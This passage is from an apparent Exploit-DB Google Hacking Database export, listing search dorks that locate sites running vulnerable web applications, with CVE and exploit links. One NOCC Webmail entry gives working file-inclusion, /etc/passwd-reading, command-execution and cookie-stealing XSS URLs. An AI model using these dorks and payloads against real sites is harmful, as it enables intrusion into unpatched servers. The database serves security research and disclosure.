<date>2010-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>2197</id>
<link>https://www.exploit-db.com/ghdb/2197</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Website Powered By Creative SplashWorks - SplashSite&quot;</shortDescription>
<textualDescription>Creative SplashWorks-SplashSite (page.php) Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11300</textualDescription>
<query>&quot;Website Powered By Creative SplashWorks - SplashSite&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Website+Powered+By+Creative+SplashWorks+-+SplashSite%22</querystring>
<edb>https://www.exploit-db.com/exploits/11300</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2573</id>
<link>https://www.exploit-db.com/ghdb/2573</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media&quot;</shortDescription>
<textualDescription>Subdreamer Pro v3.0.4 CMS upload Vulnerability: https://www.exploit-db.com/exploits/14101</textualDescription>
<query>&quot;Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media&quot;</query>
<querystring>https://www.google.com/search?q=%22Website+powered+by+Subdreamer+CMS+%26+Sequel+Theme+Designed+by+indiqo.media%22</querystring>
<edb>https://www.exploit-db.com/exploits/14101</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3425</id>
<link>https://www.exploit-db.com/ghdb/3425</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Welcome to Exponent CMS&quot; | &quot;my new exponent site&quot;</shortDescription>
<textualDescription>Exponent CMS 0.96.3 (view) Remote Command Execution - CVE: 2006-4963: https://www.exploit-db.com/exploits/2391</textualDescription>
<query>&quot;Welcome to Exponent CMS&quot; | &quot;my new exponent site&quot;</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+Exponent+CMS%22+|+%22my+new+exponent+site%22</querystring>
<edb>https://www.exploit-db.com/exploits/2391</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2147</id>
<link>https://www.exploit-db.com/ghdb/2147</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Welcome to Exponent CMS&quot; | &quot;my new exponent site&quot; inurl:articlemodule</shortDescription>
<textualDescription>Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11349</textualDescription>
<query>&quot;Welcome to Exponent CMS&quot; | &quot;my new exponent site&quot; inurl:articlemodule</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+Exponent+CMS%22+|+%22my+new+exponent+site%22++inurl:articlemodule</querystring>
<edb>https://www.exploit-db.com/exploits/11349</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1165</id>
<link>https://www.exploit-db.com/ghdb/1165</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Welcome to the versatileBulletinBoard&quot; | &quot;Powered by versatileBulletinBoard&quot;</shortDescription>
<textualDescription>versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosureadvisory:http://rgod.altervista.org/versatile100RC2.html</textualDescription>
<query>&quot;Welcome to the versatileBulletinBoard&quot; | &quot;Powered by versatileBulletinBoard&quot;</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+the+versatileBulletinBoard%22+%7C+%22Powered+by+versatileBulletinBoard%22</querystring>
<edb></edb>
<date>2005-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>1922</id>
<link>https://www.exploit-db.com/ghdb/1922</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;wow roster version 1.*&quot;</shortDescription>
<textualDescription>WoW Roster 1.70 (/lib/phpbb.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2109</textualDescription>
<query>&quot;wow roster version 1.*&quot;</query>
<querystring>https://www.google.com/search?q=%22wow+roster+version+1.*%22</querystring>
<edb>https://www.exploit-db.com/exploits/2109</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1925</id>
<link>https://www.exploit-db.com/ghdb/1925</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;wow roster version 1.5.*&quot;</shortDescription>
<textualDescription>WoW Roster 1.5.1 (subdir) Remote File Include Vulnerability - CVE: 2006-3998: https://www.exploit-db.com/exploits/2099</textualDescription>
<query>&quot;wow roster version 1.5.*&quot;</query>
<querystring>https://www.google.com/search?q=%22wow+roster+version+1.5.*%22</querystring>
<edb>https://www.exploit-db.com/exploits/2099</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3165</id>
<link>https://www.exploit-db.com/ghdb/3165</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;X-CART. Powerful PHP shopping cart software&quot;</shortDescription>
<textualDescription>X-Cart ? Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4907: https://www.exploit-db.com/exploits/4396</textualDescription>
<query>&quot;X-CART. Powerful PHP shopping cart software&quot;</query>
<querystring>https://www.google.com/search?q=%22X-CART.+Powerful+PHP+shopping+cart+software%22</querystring>
<edb>https://www.exploit-db.com/exploits/4396</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2886</id>
<link>https://www.exploit-db.com/ghdb/2886</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Yogurt build&quot;</shortDescription>
<textualDescription>Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities - CVE: 2009-2033: https://www.exploit-db.com/exploits/8932</textualDescription>
<query>&quot;Yogurt build&quot;</query>
<querystring>https://www.google.com/search?q=%22Yogurt+build%22</querystring>
<edb>https://www.exploit-db.com/exploits/8932</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2157</id>
<link>https://www.exploit-db.com/ghdb/2157</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;You have not provided a survey identification number&quot;</shortDescription>
<textualDescription>LimeSurvey 1.52 (language.php) Remote File Inclusion Vulnerability - CVE: 2007-5573: https://www.exploit-db.com/exploits/4544</textualDescription>
<query>&quot;You have not provided a survey identification number&quot;</query>
<querystring>https://www.google.com/search?q=%22You+have+not+provided+a+survey+identification+number%22</querystring>
<edb>https://www.exploit-db.com/exploits/4544</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1346</id>
<link>https://www.exploit-db.com/ghdb/1346</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;You have not provided a survey identification number&quot; ERROR -xoops.org &quot;please contact&quot;</shortDescription>
<textualDescription>sql injection:http://www.securityfocus.com/bid/16077/discussremote command execution:http://retrogod.altervista.org/phpsurveyor_0995_xpl.html</textualDescription>
<query>&quot;You have not provided a survey identification num</query>
<querystring>https://www.google.com/search?num=100&amp;q=phpsurveyor+%22%5BExit+and+Clear+Survey%5D%22&amp;btnG=H%C4%BEada%C5%A5</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1651</id>
<link>https://www.exploit-db.com/ghdb/1651</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;© 2004 PHPKick.de Version 0.8&quot;</shortDescription>
<textualDescription>PHPKick v0.8 statistics.php SQL Injection - CVE: 2010-3029: https://www.exploit-db.com/exploits/14578</textualDescription>
<query>&quot;© 2004 PHPKick.de Version 0.8&quot;</query>
<querystring>https://www.google.com/search?q=%22%C2%A9+2004+PHPKick.de+Version+0.8%22</querystring>
<edb>https://www.exploit-db.com/exploits/14578</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1857</id>
<link>https://www.exploit-db.com/ghdb/1857</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;© 2008 DevWorx - devworx.somee.com&quot;</shortDescription>
<textualDescription>TermiSBloG V 1.0 SQL Injection(s) Vulnerability: https://www.exploit-db.com/exploits/11081</textualDescription>
<query>&quot;© 2008 DevWorx - devworx.somee.com&quot;</query>
<querystring>https://www.google.com/search?q=%22%C2%A9+2008+DevWorx+-+devworx.somee.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/11081</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1684</id>
<link>https://www.exploit-db.com/ghdb/1684</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;© 2009 Azimut Technologie&quot;</shortDescription>
<textualDescription>Azimut Technologie Admin Login Bypass vulnerability: https://www.exploit-db.com/exploits/12695</textualDescription>
<query>&quot;© 2009 Azimut Technologie&quot;</query>
<querystring>https://www.google.com/search?q=%22%C2%A9+2009+Azimut+Technologie%22</querystring>
<edb>https://www.exploit-db.com/exploits/12695</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1876</id>
<link>https://www.exploit-db.com/ghdb/1876</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;© Sabdrimer CMS&quot;</shortDescription>
<textualDescription>Sabdrimer PRO 2.2.4 (pluginpath) Remote File Include Vulnerability - CVE: 2006-3520: https://www.exploit-db.com/exploits/1996</textualDescription>
<query>&quot;© Sabdrimer CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22%C2%A9+Sabdrimer+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/1996</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1955</id>
<link>https://www.exploit-db.com/ghdb/1955</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>''com_noticias''</shortDescription>
<textualDescription>Joomla Component com_noticias 1.0 SQL Injection Vulnerability - CVE: 2008-0670: https://www.exploit-db.com/exploits/5081</textualDescription>
<query>''com_noticias''</query>
<querystring>https://www.google.com/search?q=''com_noticias''</querystring>
<edb>https://www.exploit-db.com/exploits/5081</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2540</id>
<link>https://www.exploit-db.com/ghdb/2540</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>''links.asp?CatId''</shortDescription>
<textualDescription>ASPapp (links.asp CatId) Remote SQL Injection Vulnerability - CVE: 2008-1430: https://www.exploit-db.com/exploits/5276</textualDescription>
<query>''links.asp?CatId''</query>
<querystring>https://www.google.com/search?q=''links.asp%3FCatId''</querystring>
<edb>https://www.exploit-db.com/exploits/5276</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1493</id>
<link>https://www.exploit-db.com/ghdb/1493</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>''name Kose_Yazilari op viewarticle artid''</shortDescription>
<textualDescription>PHP-Nuke Module Kose_Yazilari (artid) SQL Injection Vulnerability - CVE: 2008-1053: https://www.exploit-db.com/exploits/5186</textualDescription>
<query>''name Kose_Yazilari op viewarticle artid''</query>
<querystring>https://www.google.com/search?q=''name+Kose_Yazilari+op+viewarticle+artid''</querystring>
<edb>https://www.exploit-db.com/exploits/5186</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1473</id>
<link>https://www.exploit-db.com/ghdb/1473</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>''showad.php?listingid=''</shortDescription>
<textualDescription>BM Classifieds 20080409 Multiple SQL Injection Vulnerabilities - CVE: 2008-1272: https://www.exploit-db.com/exploits/5223</textualDescription>
<query>''showad.php?listingid=''</query>
<querystring>https://www.google.com/search?q=''showad.php%3Flistingid%3D''</querystring>
<edb>https://www.exploit-db.com/exploits/5223</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2812</id>
<link>https://www.exploit-db.com/ghdb/2812</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>''webboard question.asp QID''</shortDescription>
<textualDescription>PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability - CVE: 2008-1039: https://www.exploit-db.com/exploits/5185</textualDescription>
<query>''webboard question.asp QID''</query>
<querystring>https://www.google.com/search?q=''webboard+question.asp+QID''</querystring>
<edb>https://www.exploit-db.com/exploits/5185</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2144</id>
<link>https://www.exploit-db.com/ghdb/2144</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>'SEO by NuSEO.PHP'</shortDescription>
<textualDescription>NuSEO PHP Enterprise 1.6 Remote File Inclusion Vulnerability - CVE: 2007-5409: https://www.exploit-db.com/exploits/4512</textualDescription>
<query>'SEO by NuSEO.PHP'</query>
<querystring>https://www.google.com/search?q='SEO+by+NuSEO.PHP'</querystring>
<edb>https://www.exploit-db.com/exploits/4512</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3603</id>
<link>https://www.exploit-db.com/ghdb/3603</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>(&quot;powered by nocc&quot; intitle:&quot;NOCC Webmail&quot;) -site:sourceforge.net -Zoekinalles.nl -analysis</shortDescription>
<textualDescription>NOCC Webmail 1.0 (Local Inclusion) Remote Code Execution Exploit - CVE: 2006-0891: https://www.exploit-db.com/exploits/1522/</textualDescription>
<query>(&quot;powered by nocc&quot; intitle:&quot;NOCC Webmail&quot;) -site:sourceforge.net -Zoekinalles.nl -analysis</query>
<querystring>https://www.google.com/search?q=(%22powered+by+nocc%22+intitle:%22NOCC+Webmail%22)+-site:sourceforge.net+-Zoekinalles.nl+-analysis</querystring>
<edb>https://www.exploit-db.com/exploits/1522</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1307</id>
<link>https://www.exploit-db.com/ghdb/1307</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>(&quot;powered by nocc&quot; intitle:&quot;NOCC Webmail&quot;) -site:sourceforge.net -Zoekinalles.nl -analysis</shortDescription>
<textualDescription>dork: (&quot;powered by nocc&quot; intitle:&quot;NOCC Webmail&quot;) -site:sourceforge.net -Zoekinalles.nl -analysis software: http://nocc.sourceforge.net/ this is for Nocc Webmail multiple arbitrary local inclusion, multiple xss &amp; possible remote code execution flaws I found: example of arbitrary local inclusion: http://[target]/[path]/html/footer.php?cmd=dir&amp;_SESSION[nocc_theme]=../../../../../../../../../test.php%00 http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=fr&amp;theme=../../../../../../../../../../../../etc/passwd%00 http://[target]/[path]/index.php?lang=../../../../../../../../../../../../test example of commands execution (including an uploaded mail attachment with php code inside, filename is predictable...) http://[target]/[path]/index.php?cmd=dir&amp;lang=../tmp/php331.tmp1140514888.att%00 xss: http://[target]/[path]/html/error.php?html_error_occurred=alert(document.cookie) http://[target]/[path]/html/filter_prefs.php?html_filter_select=alert(document.cookie) http://[target]/[path]/html/no_mail.php?html_no_mail=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?page_line=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?prev=alert(document.cookie) http://[target]/[path]/html/html_bottom_table.php?next=alert(document.cookie) http://[target]/[path]/html/footer.php?_SESSION[nocc_theme]=&quot;&gt;alert(document.cookie) full advisory &amp; poc exploit: http://retrogod.altervista.org/noccw_10_incl_xpl.html</textualDescription>
<query>(&quot;powered by nocc&quot; intitle:&quot;NOCC Webmail&quot;) -site:sourceforge.net -Zoekinalles.nl -analysis</query>
<querystring>https://www.google.com/search?q=%28%22powered+by+nocc%22+intitle%3A%22NOCC+Webmail%22%29+-site%3Asourceforge.net+-Zoekinalles.nl+-analysis+&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1206</id>
<link>https://www.exploit-db.com/ghdb/1206</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>(&quot;Skin Design by Amie of Intense&quot;)|(&quot;Fanfiction Categories&quot; &quot;Featured Stories&quot;)|(&quot;default2, 3column, Romance, eFiction&quot;)</shortDescription>
<textualDescription>eFiction</textualDescription>
<query>(&quot;Skin Design by Amie of Intense&quot;)|(&quot;Fanfiction Categories&quot; &quot;Featured Stories&quot;)|(&quot;default2, 3column, Romance, eFiction&quot;)</query>
<querystring>https://www.google.com/search?q=%28%22Skin+Design+by+Amie+of+Intense%22%29%7C%28%22Fanfiction+Categories%22+%22Featured+Stories%22%29%7C%28%22default2%2C+3column%2C+Romance%2C+eFiction%22%29&amp;filter=0</querystring>
<edb></edb>
<date>2005-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1302</id>
<link>https://www.exploit-db.com/ghdb/1302</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>(&quot;This Dragonflyâââ¬Å¾Ã¢ installation was&quot; | &quot;Thanks for downloading Dragonfly&quot;) -inurl:demo -inurl:cpgnuke.com</shortDescription>
<textualDescription>exploit and short explaination: http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html</textualDescription>
<query>(&quot;This Dragonflyâââ¬Å¾Ã¢ installation was&quot; | &quot;Thanks for downloading Dragonfly&quot;) -inurl:demo -inurl:cpgnuke.com</query>
<querystring>https://www.google.com/search?q=(%22This+Dragonfly%E2%84%A2+installation+was%22+%7C+%22Thanks+for+downloading+Dragonfly%22)+-inurl:demo+-inurl:cpgnuke.com&amp;start=20&amp;sa=N</querystring>
<edb></edb>
<date>2006-02-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1934</id>
<link>https://www.exploit-db.com/ghdb/1934</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1</shortDescription>
<textualDescription>Bux.to Clone Script Insecure Cookie Handling Vulnerability - CVE: 2008-6162: https://www.exploit-db.com/exploits/6652</textualDescription>
<query>(c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1</query>
<querystring>https://www.google.com/search?q=(c)+SriptBux+2008+|+Powered+By+ScriptBux+version+2.50+beta+1</querystring>
<edb>https://www.exploit-db.com/exploits/6652</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1304</id>
<link>https://www.exploit-db.com/ghdb/1304</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>(intitle:&quot;Flyspray setup&quot;|&quot;powered by flyspray 0.9.7&quot;) -flyspray.rocks.cc</shortDescription>
<textualDescription>exploiting a bug in EGS Enterprise Groupware System 1.0 rc4, I found this dork: (intitle:&quot;Flyspray setup&quot;|&quot;powered by flyspray 0.9.7&quot;) -flyspray.rocks.cc It is related to the installation script of FileSpray 0.9.7, now I'm going to test 0.9.8-9 by now switch to sql/ directory and search the install-0.9.7.php script explaination link: http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.htmlexploit adjusted for flyspray: http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html</textualDescription>
<query>(intitle:&quot;Flyspray setup&quot;|&quot;powered by flyspray 0.9.7&quot;) -flyspray.rocks.cc</query>
<querystring>https://www.google.com/search?q=%28intitle%3A%22Flyspray+setup%22%7C%22powered+by+flyspray+0.9.7%22%29+-flyspray.rocks.cc+&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2006-02-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1266</id>
<link>https://www.exploit-db.com/ghdb/1266</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>(intitle:&quot;metaframe XP Login&quot;)|(intitle:&quot;metaframe Presentation server Login&quot;)</shortDescription>
<textualDescription>Once you input any username, you'll get an error message. Try putting a script with some other fun commands in it. Just send some info off to be logged.If exploited correctly, could give you admin access to a network.</textualDescription>
<query>(intitle:&quot;metaframe XP Login&quot;)|(intitle:&quot;metaframe Presentation server Login&quot;)</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%28intitle%3A%22metaframe+XP+Login%22%29%7C%28intitle%3A%22metaframe+Presentation+server+Login%22%29</querystring>
<edb></edb>
<date>2006-02-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>737</id>
<link>https://www.exploit-db.com/ghdb/737</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>+&quot;Powered by Invision Power Board v2.0.0..2&quot;</shortDescription>
<textualDescription>A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query.http://www.securityfocus.com/bid/11719</textualDescription>
<query>+&quot;Powered by Invision Power Board v2.0.0..2&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%2B%22Powered+by+Invision+Power+Board+v2.0.0..2%22</querystring>
<edb></edb>
<date>2004-12-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>743</id>
<link>https://www.exploit-db.com/ghdb/743</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>+&quot;Powered by phpBB 2.0.6..10&quot; -phpbb.com -phpbb.pl</shortDescription>
<textualDescription>phpbb is vulnerable to SQL Injection, allowing people to minipulate the query into pulling data (such as passwords). Arbituary EXEC allows an attacker (if they get on to a new line), to execute their own PHP, which can be fatal.</textualDescription>
<query>+&quot;Powered by phpBB 2.0.6..10&quot; -phpbb.com -phpbb.pl</query>
<querystring>https://www.google.com/search?num=100&amp;q=+%2B%22Powered+by+phpBB+2.0.6..10%22+-phpbb.com+-phpbb.pl</querystring>
<edb></edb>
<date>2004-12-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>1004</id>
<link>https://www.exploit-db.com/ghdb/1004</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>+intext:&quot;powered by MyBulletinBoard&quot;</shortDescription>
<textualDescription>MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB)</textualDescription>
<query>+intext:&quot;powered by MyBulletinBoard&quot;</query>
<querystring>https://www.google.com/search?q=%2Bintext%3A%22powered+by+MyBulletinBoard%22&amp;safe=off&amp;c2coff=1&amp;rls=org.mozilla%3Aen-US%3Aofficial</querystring>
<edb></edb>
<date>2005-06-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>2472</id>
<link>https://www.exploit-db.com/ghdb/2472</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>/index.php?option=com_restaurante</shortDescription>
<textualDescription>Joomla Component Restaurante Remote File Upload Vulnerability - CVE: 2007-4817: https://www.exploit-db.com/exploits/4383</textualDescription>
<query>/index.php?option=com_restaurante</query>
<querystring>https://www.google.com/search?q=/index.php%3Foption%3Dcom_restaurante</querystring>
<edb>https://www.exploit-db.com/exploits/4383</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2034</id>
<link>https://www.exploit-db.com/ghdb/2034</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>/modules/amevents/print.php?id=</shortDescription>
<textualDescription>XOOPS Module Amevents (print.php id) SQL Injection Vulnerability - CVE: 2008-5768: https://www.exploit-db.com/exploits/7479</textualDescription>
<query>/modules/amevents/print.php?id=</query>
<querystring>https://www.google.com/search?q=/modules/amevents/print.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/7479</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1661</id>
<link>https://www.exploit-db.com/ghdb/1661</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>/modules/mx_links/</shortDescription>
<textualDescription>mxBB Module WebLinks 2.05 Remote Inclusion Vulnerability - CVE: 2006-6645: https://www.exploit-db.com/exploits/2939</textualDescription>
<query>/modules/mx_links/</query>
<querystring>https://www.google.com/search?q=/modules/mx_links/</querystring>
<edb>https://www.exploit-db.com/exploits/2939</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2537</id>
<link>https://www.exploit-db.com/ghdb/2537</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>/modules/tadbook2/open_book.php?book_sn=</shortDescription>
<textualDescription>XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln: https://www.exploit-db.com/exploits/7725</textualDescription>
<query>/modules/tadbook2/open_book.php?book_sn=</query>
<querystring>https://www.google.com/search?q=/modules/tadbook2/open_book.php%3Fbook_sn%3D</querystring>
<edb>https://www.exploit-db.com/exploits/7725</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2030</id>
<link>https://www.exploit-db.com/ghdb/2030</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>/modules/xhresim/</shortDescription>
<textualDescription>XOOPS Module xhresim (index.php no) Remote SQL Injection Vuln - CVE: 2008-5665: https://www.exploit-db.com/exploits/6748</textualDescription>
<query>/modules/xhresim/</query>
<querystring>https://www.google.com/search?q=/modules/xhresim/</querystring>
<edb>https://www.exploit-db.com/exploits/6748</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2785</id>
<link>https://www.exploit-db.com/ghdb/2785</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>2009 © Satellite-X</shortDescription>
<textualDescription>Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11962</textualDescription>
<query>2009 © Satellite-X</query>
<querystring>https://www.google.com/search?q=2009+%C2%A9+Satellite-X</querystring>
<edb>https://www.exploit-db.com/exploits/11962</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2025</id>
<link>https://www.exploit-db.com/ghdb/2025</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>724CMS Powered, 724CMS Version 4.59. Enterprise</shortDescription>
<textualDescription>724CMS Enterprise Version 4.59 SQL Injection Vulnerability - CVE: 2008-1858: https://www.exploit-db.com/exploits/12560</textualDescription>
<query>724CMS Powered, 724CMS Version 4.59. Enterprise</query>
<querystring>https://www.google.com/search?q=724CMS+Powered,+724CMS+Version+4.59.+Enterprise</querystring>
<edb>https://www.exploit-db.com/exploits/12560</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3682</id>
<link>https://www.exploit-db.com/ghdb/3682</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>:inurl:mj_wwwusr</shortDescription>
<textualDescription>https://www.exploit-db.com/exploits/16103/</textualDescription>
<query>http://www.google.com/#sclient=psy&amp;hl=en&amp;safe=off&amp;site=&amp;source=hp&amp;q=:inurl%3Amj_wwwusr&amp;aq=f&amp;aqi=&amp;aql=&amp;oq=&amp;pbx=1&amp;fp=2dcb6979649afcb0</query>
<querystring>https://www.google.com/search?q=:inurl%3Amj_wwwusr</querystring>
<edb>https://www.exploit-db.com/exploits/16103</edb>
<date>2011-02-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>2591</id>
<link>https://www.exploit-db.com/ghdb/2591</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>?action=pro_show and ?action=disppro</shortDescription>
<textualDescription>EPShop 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-3412: https://www.exploit-db.com/exploits/6139</textualDescription>
<query>?action=pro_show and ?action=disppro</query>
<querystring>https://www.google.com/search?q=%3Faction%3Dpro_show+and+%3Faction%3Ddisppro</querystring>
<edb>https://www.exploit-db.com/exploits/6139</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>438</id>
<link>https://www.exploit-db.com/ghdb/438</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Achievo webbased project management</shortDescription>
<textualDescription>Achievo is a free web-based project management tool for business-environments. Achievo's is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite. More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html</textualDescription>
<query>inurl:&quot;dispatch.php?atknodetype&quot; | inurl:class.at</query>
<querystring>https://www.google.com/search?q=inurl:%22dispatch.php%3Fatknodetype%22+%7C++inurl:class.atkdateattribute.js.php&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2004-08-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1998</id>
<link>https://www.exploit-db.com/ghdb/1998</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Actionnée par smartblog</shortDescription>
<textualDescription>Smartblog (index.php tid) Remote SQL Injection Vulnerability - CVE: 2008-2185: https://www.exploit-db.com/exploits/5535</textualDescription>
<query>Actionnée par smartblog</query>
<querystring>https://www.google.com/search?q=Actionn%C3%83%C6%92%C3%82%C2%A9e+par+smartblog</querystring>
<edb>https://www.exploit-db.com/exploits/5535</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3698</id>
<link>https://www.exploit-db.com/ghdb/3698</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>ADAN (view.php ) Sql Injection Vulnerability</shortDescription>
<textualDescription>SQL Injection: https://www.exploit-db.com/exploits/16276/
</textualDescription>
<query>ADAN (view.php ) Sql Injection Vulnerability</query>
<querystring>https://www.google.com/search?q=&quot;POWERED BY ADAN&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/16276</edb>
<date>2011-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>2014</id>
<link>https://www.exploit-db.com/ghdb/2014</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>ADP Forum 2.0.3 is powered by VzScripts</shortDescription>
<textualDescription>Vz (Adp) Forum 2.0.3 Remote Password Disclosure Vulnerablity - CVE: 2006-6891: https://www.exploit-db.com/exploits/3053</textualDescription>
<query>ADP Forum 2.0.3 is powered by VzScripts</query>
<querystring>https://www.google.com/search?q=ADP+Forum+2.0.3+is+powered+by+VzScripts</querystring>
<edb>https://www.exploit-db.com/exploits/3053</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2755</id>
